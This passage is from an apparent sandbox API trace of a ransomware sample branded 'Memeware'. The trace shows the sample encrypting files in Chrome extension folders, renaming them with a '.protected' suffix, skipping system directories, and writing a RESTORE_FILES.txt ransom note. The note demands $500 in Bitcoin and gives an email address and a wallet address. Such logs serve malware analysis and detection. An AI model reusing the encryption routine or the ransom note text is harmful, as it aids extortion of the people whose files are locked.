lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.135] CloseHandle (hObject=0x164) returned 1 [0080.135] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0080.135] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0080.135] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl") returned 141 [0080.136] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0080.136] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0080.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\*") returned 143 [0080.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.136] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.136] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.136] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.136] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.136] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\.") returned 143 [0080.136] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.136] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.136] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.136] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.136] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.136] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.136] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\..") returned 144 [0080.136] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.136] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.136] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.136] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json") 
returned 155 [0080.137] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.137] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json") returned 155 [0080.137] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json") returned 155 [0080.137] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json") returned 155 [0080.137] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.137] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0080.138] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.138] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0080.138] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.138] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.138] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.139] CloseHandle (hObject=0x168) returned 1 [0080.139] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.protected") returned 165 [0080.139] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json.protected")) returned 1 [0080.139] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.139] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.140] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0080.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.140] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.140] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.141] lstrlenA (lpString="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") returned 684 [0080.141] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.141] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.141] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.141] CloseHandle (hObject=0x164) returned 1 [0080.141] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0080.141] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0080.141] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR") returned 144 [0080.141] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0080.141] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0080.141] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\*") returned 146 [0080.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.142] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.142] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.142] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.142] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.142] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.142] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\.") returned 146 [0080.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.142] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.142] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.142] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.142] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.142] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.142] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.142] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\..") returned 147 [0080.142] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.142] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.142] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.142] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.142] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.142] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.142] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.142] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.143] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.144] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.144] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.144] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.144] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.144] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.144] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.144] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.145] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.145] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.145] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.145] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.145] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.145] CloseHandle (hObject=0x168) returned 1 [0080.145] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0080.145] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0080.146] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.146] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.146] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0080.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.147] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.147] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.147] lstrlenA (lpString="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") returned 684 [0080.147] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0080.148] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.148] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.148] CloseHandle (hObject=0x164) returned 1 [0080.148] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0080.148] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0080.148] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT") returned 144 [0080.148] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0080.148] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0080.148] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\*") returned 146 [0080.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0080.148] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.148] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.148] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.148] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.148] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.148] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\.") returned 146 [0080.148] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.148] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.148] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.149] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.149] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.149] lstrcmpiW 